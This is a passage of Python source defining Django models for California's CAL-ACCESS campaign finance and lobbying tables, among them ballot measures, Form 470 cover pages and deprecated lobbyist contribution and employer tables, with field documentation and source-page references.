from __future__ import unicode_literals
# Models
from django.db import models
from calaccess_raw import fields
from .base import CalAccessBaseModel
from django.utils.encoding import python_2_unicode_compatible
# Annotations
from calaccess_raw import annotations
from calaccess_raw.annotations import DocumentCloud
@python_2_unicode_compatible
class BallotMeasuresCd(CalAccessBaseModel):
"""
Ballot-measure dates and times.
"""
UNIQUE_KEY = "FILER_ID"
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=7),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=19),
]
election_date = fields.DateField(
db_column='ELECTION_DATE',
null=True,
help_text="Ballot measure election date"
)
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
measure_no = fields.CharField(
db_column='MEASURE_NO',
max_length=2,
help_text="Ballot measure number"
)
measure_name = fields.CharField(
db_column='MEASURE_NAME',
max_length=163,
help_text="Ballot measure full name"
)
measure_short_name = fields.CharField(
db_column='MEASURE_SHORT_NAME',
max_length=50,
blank=True,
help_text="Ballot measure short name"
)
jurisdiction = fields.CharField(
db_column='JURISDICTION',
max_length=9,
help_text="This field is undocumented"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'BALLOT_MEASURES_CD'
ordering = (
"-election_date",
"measure_no",
"measure_short_name",
"measure_name"
)
def __str__(self):
return self.measure_name
@python_2_unicode_compatible
class CvrF470Cd(CalAccessBaseModel):
"""
The cover page for officeholder and candidate short and supplemental forms.
"""
UNIQUE_KEY = (
"FILING_ID",
"AMEND_ID",
"REC_TYPE",
"FORM_TYPE",
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=8),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=30, end_page=32),
DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=15, end_page=16),
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29, end_page=30),
]
FILING_FORMS = [
annotations.get_form('F470'),
]
amend_id = fields.IntegerField(
db_column="AMEND_ID",
db_index=True,
help_text="Amendment Identification number. A number of 0 is an original filing and 1 "
"to 999 amendments."
)
cand_adr1 = fields.CharField(
db_column="CAND_ADR1",
blank=True,
max_length=55,
help_text="First line of the filer's street address."
)
cand_adr2 = fields.CharField(
db_column="CAND_ADR2",
blank=True,
max_length=55,
help_text="Second line of the filer's street address. "
)
cand_city = fields.CharField(
db_column="CAND_CITY",
blank=True,
max_length=30,
help_text="Candidate/Officeholder's City."
)
cand_email = fields.CharField(
db_column="CAND_EMAIL",
blank=True,
max_length=60,
help_text="Candidate/Officeholder's EMail address. Not required by the form."
)
cand_fax = fields.CharField(
db_column="CAND_FAX",
blank=True,
max_length=20,
help_text="Candidate/Officeholder's FAX Phone Number. Not required by the form."
)
cand_phon = fields.CharField(
db_column="CAND_PHON",
blank=True,
max_length=20,
help_text="Candidate/Officeholder's phone number."
)
cand_st = fields.CharField(
db_column="CAND_ST",
blank=True,
max_length=2,
help_text="Filer's State"
)
cand_zip4 = fields.CharField(
db_column="CAND_ZIP4",
blank=True,
max_length=10,
help_text="Filer's zipcode"
)
date_1000 = fields.DateField(
db_column="DATE_1000",
help_text="Date contributions totaling $1,000 or more. (For the 470-S)"
)
dist_no = fields.CharField(
db_column="DIST_NO",
blank=True,
max_length=3,
help_text="District number for the office being sought. Populated for Senate, Assembly, "
"or Board of Equalization races."
)
elect_date = fields.DateField(
db_column="ELECT_DATE",
help_text="Date of the general election. Required for filings in even years."
)
ENTITY_CD_CHOICES = (
('CAO', annotations.choices.CAMPAIGN_ENTITY_CODES['CAO']),
)
entity_cd = fields.CharField(
db_column="ENTITY_CD",
blank=True,
choices=ENTITY_CD_CHOICES,
max_length=3,
help_text="The filer's entity code. The value of this column will always be "
"Candidate/Office Holder (CAO) for this table.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29)
]
)
filer_id = fields.CharField(
db_column="FILER_ID",
blank=True,
max_length=9,
help_text="Filer's unique identification number."
)
filer_namf = fields.CharField(
db_column="FILER_NAMF",
blank=True,
max_length=45,
help_text="Filer's First Name(s) - required for individuals"
)
filer_naml = fields.CharField(
db_column="FILER_NAML",
blank=True,
max_length=200,
help_text="Filer's Last Name/Committee name"
)
filer_nams = fields.CharField(
db_column="FILER_NAMS",
blank=True,
max_length=10,
help_text="Filer's Name Suffix"
)
filer_namt = fields.CharField(
db_column="FILER_NAMT",
blank=True,
max_length=10,
help_text="The filer's prefix or title that preceeds their name if they are an individual."
)
filing_id = fields.IntegerField(
db_column="FILING_ID",
db_index=True,
help_text="Unique filing identification number."
)
FORM_TYPE_CHOICES = tuple([(f.db_value, f.full_title) for f in FILING_FORMS])
form_type = fields.CharField(
db_column="FORM_TYPE",
choices=FORM_TYPE_CHOICES,
db_index=True,
max_length=4,
help_text="Type of Filing or Formset. The value of this column will always "
"be equal to F470.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
JURIS_CD_CHOICES = annotations.sort_choices(annotations.choices.JURIS_CODES)
juris_cd = fields.CharField(
db_column="JURIS_CD",
choices=JURIS_CD_CHOICES,
blank=True,
max_length=3,
help_text="Office Jurisdiction Code",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
juris_dscr = fields.CharField(
db_column="JURIS_DSCR",
blank=True,
max_length=40,
help_text="Office jurisdiction description text reqired if the jurisdiction code "
"(Juris_cd) is equal to CIT, CTY, LOC, or OTH."
)
OFF_S_H_CD_CHOICES = annotations.sort_choices(annotations.choices.OFF_S_H_CODES)
off_s_h_cd = fields.CharField(
db_column="OFF_S_H_CD",
choices=OFF_S_H_CD_CHOICES,
blank=True,
max_length=1,
help_text='Office Sought/Held code. Legal values are "S" for sought and "H" for held.',
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=30),
]
)
offic_dscr = fields.CharField(
db_column="OFFIC_DSCR",
blank=True,
max_length=40,
help_text="Office sought description used if the office code is other (OTH)."
)
OFFICE_CD_CODES = annotations.sort_choices(annotations.choices.OFFICE_CODES)
office_cd = fields.CharField(
db_column="OFFICE_CD",
choices=OFFICE_CD_CODES,
blank=True,
max_length=3,
help_text="Code that identifies the office being sought. See the CAL document for "
"a list of valid codes.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
REC_TYPE_CHOICES = (
('CVR', 'Cover Page'),
)
rec_type = fields.CharField(
db_column="REC_TYPE",
choices=REC_TYPE_CHOICES,
blank=True,
max_length=3,
help_text="Type of CAL record. This column will always contain CVR.",
documentcloud_pages=[
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29),
]
)
report_num = fields.CharField(
db_column="REPORT_NUM",
blank=True,
max_length=3,
help_text="Report Number; 000 Original; 001-999 Amended as reported in the filing."
)
rpt_date = fields.DateField(
db_column="RPT_DATE",
db_index=True,
null=True,
help_text="Date this report is filed as reported by the filer."
)
def __str__(self):
return str(self.amend_id)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'CVR_F470_CD'
@python_2_unicode_compatible
class FilerTypePeriodsCd(CalAccessBaseModel):
"""
Undocumented.
The table's official description contains this note: "J M needs to document. This is
in his list of tables designed for future enhancements."
"""
UNIQUE_KEY = (
"ELECTION_TYPE",
"FILER_TYPE",
"PERIOD_ID",
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=8),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=71),
]
ELECTION_TYPE_CHOICES = (
(0, 'N/A'),
(3001, 'GENERAL'),
(3002, 'PRIMARY'),
(3003, 'RECALL'),
(3004, 'SPECIAL ELECTION'),
(3005, 'OFFICEHOLDER'),
(3006, 'SPECIAL RUNOFF'),
)
election_type = fields.IntegerField(
db_column="ELECTION_TYPE",
db_index=True,
choices=ELECTION_TYPE_CHOICES,
help_text="Election type",
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=3, end_page=4),
],
)
filer_type = fields.ForeignKeyField(
'FilerTypesCd',
related_name='filing_type_periods',
db_constraint=False,
db_column="FILER_TYPE",
db_index=True,
help_text="Foreign key referencing FilerTypesCd.filer_type",
on_delete=models.CASCADE
)
period_id = fields.ForeignKeyField(
'FilingPeriodCd',
related_name='filing_type_periods',
db_constraint=False,
db_column="PERIOD_ID",
db_index=True,
help_text="Foreign key referencing FilingPeriodCd.period_id",
on_delete=models.CASCADE
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'FILER_TYPE_PERIODS_CD'
def __str__(self):
return str(self.election_type)
@python_2_unicode_compatible
class LobbyistContributions1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS2_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id="2711614-CalAccessTablesWeb", start_page=10),
DocumentCloud(id="2711614-CalAccessTablesWeb", start_page=92, end_page=93),
]
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
filing_period_start_dt = fields.DateField(
null=True,
db_column='FILING_PERIOD_START_DT',
verbose_name='Filing period start date',
help_text='Start date of filing period',
)
filing_period_end_dt = fields.DateField(
db_column='FILING_PERIOD_END_DT',
null=True,
verbose_name='Filing period end date',
help_text='End date of filing period',
)
contribution_dt = fields.CharField(
db_column='CONTRIBUTION_DT',
max_length=32,
blank=True,
verbose_name='Contribution date',
help_text='Date of contribution',
)
recipient_name = fields.CharField(
db_column='RECIPIENT_NAME',
max_length=106,
blank=True,
help_text="Recipient's name"
)
recipient_id = fields.IntegerField(
db_column='RECIPIENT_ID',
blank=True,
null=True,
help_text="Recipient's identification number"
)
amount = fields.FloatField(
db_column='AMOUNT',
blank=True,
null=True,
help_text="Amount received"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_CONTRIBUTIONS1_CD'
ordering = ("-filing_period_start_dt",)
def __str__(self):
return str(self.filer_id)
@python_2_unicode_compatible
class LobbyistContributions2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
"""
UNIQUE_KEY = False
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=10, end_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=93, end_page=94),
]
filing_period_start_dt = fields.DateField(
null=True,
db_column='FILING_PERIOD_START_DT',
verbose_name='Filing period start date',
help_text='Start date of filing period',
)
filing_period_end_dt = fields.DateField(
db_column='FILING_PERIOD_END_DT',
null=True,
verbose_name='Filing period end date',
help_text='End date of filing period',
)
contribution_dt = fields.CharField(
db_column='CONTRIBUTION_DT',
max_length=32,
blank=True,
verbose_name='Contribution date',
help_text='Date of contribution',
)
recipient_name = fields.CharField(
db_column='RECIPIENT_NAME',
max_length=106,
blank=True,
help_text="Recipient's name"
)
recipient_id = fields.IntegerField(
db_column='RECIPIENT_ID',
blank=True,
null=True,
help_text="Recipient's identification number"
)
amount = fields.FloatField(
db_column='AMOUNT',
blank=True,
null=True,
help_text="Amount received"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_CONTRIBUTIONS2_CD'
ordering = ("-filing_period_start_dt",)
def __str__(self):
return str(self.filer_id)
@python_2_unicode_compatible
class LobbyistContributions3Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
According to "Cal-Access Tables, Columns, Indexes", this is the actual
Lobbyist contribution disclosure table generated from the other two
temporary tables: LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=94),
]
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
filing_period_start_dt = fields.DateField(
null=True,
db_column='FILING_PERIOD_START_DT',
verbose_name='Filing period start date',
help_text='Start date of filing period',
)
filing_period_end_dt = fields.DateField(
db_column='FILING_PERIOD_END_DT',
null=True,
verbose_name='Filing period end date',
help_text='End date of filing period',
)
contribution_dt = fields.CharField(
db_column='CONTRIBUTION_DT',
max_length=32,
blank=True,
verbose_name='Contribution date',
help_text='Date of contribution',
)
recipient_name = fields.CharField(
db_column='RECIPIENT_NAME',
max_length=106,
blank=True,
help_text="Recipient's name"
)
recipient_id = fields.IntegerField(
db_column='RECIPIENT_ID',
blank=True,
null=True,
help_text="Recipient's identification number"
)
amount = fields.FloatField(
db_column='AMOUNT',
blank=True,
null=True,
help_text="Amount received"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_CONTRIBUTIONS3_CD'
ordering = ("-filing_period_start_dt",)
def __str__(self):
return str(self.filer_id)
@python_2_unicode_compatible
class LobbyistEmpLobbyist1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=94, end_page=95),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=17,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMP_LOBBYIST1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class LobbyistEmpLobbyist2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=95),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=17,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMP_LOBBYIST2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class LobbyistEmployer1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value in observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=97, end_page=98),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column='INTEREST_CD',
choices=INTEREST_CD_CHOICES,
blank=True,
null=True,
verbose_name="interest code",
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column='INTEREST_NAME',
max_length=24,
blank=True,
verbose_name="Interest name",
help_text="Interest name",
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
verbose_name="Total amount of year 1 of the session",
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
verbose_name="Total amount of year 2 of the session",
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployer2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value in observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=98, end_page=99),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column='INTEREST_CD',
blank=True,
null=True,
choices=INTEREST_CD_CHOICES,
verbose_name="interest code",
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column='INTEREST_NAME',
max_length=24,
blank=True,
help_text="Interest name"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
verbose_name="Total amount of year 1 of the session",
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
verbose_name="Total amount of year 2 of the session",
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter 1 total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter 2 total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter 3 total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter 4 total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter 5 total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter 6 total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter 7 total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter 8 total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployer3Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value in observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=99),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column='INTEREST_CD',
blank=True,
null=True,
choices=INTEREST_CD_CHOICES,
verbose_name="interest code",
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column='INTEREST_NAME',
max_length=24,
blank=True,
help_text="Interest name"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
verbose_name="Total amount of year 1 of the session",
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
verbose_name="Total amount of year 2 of the session",
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
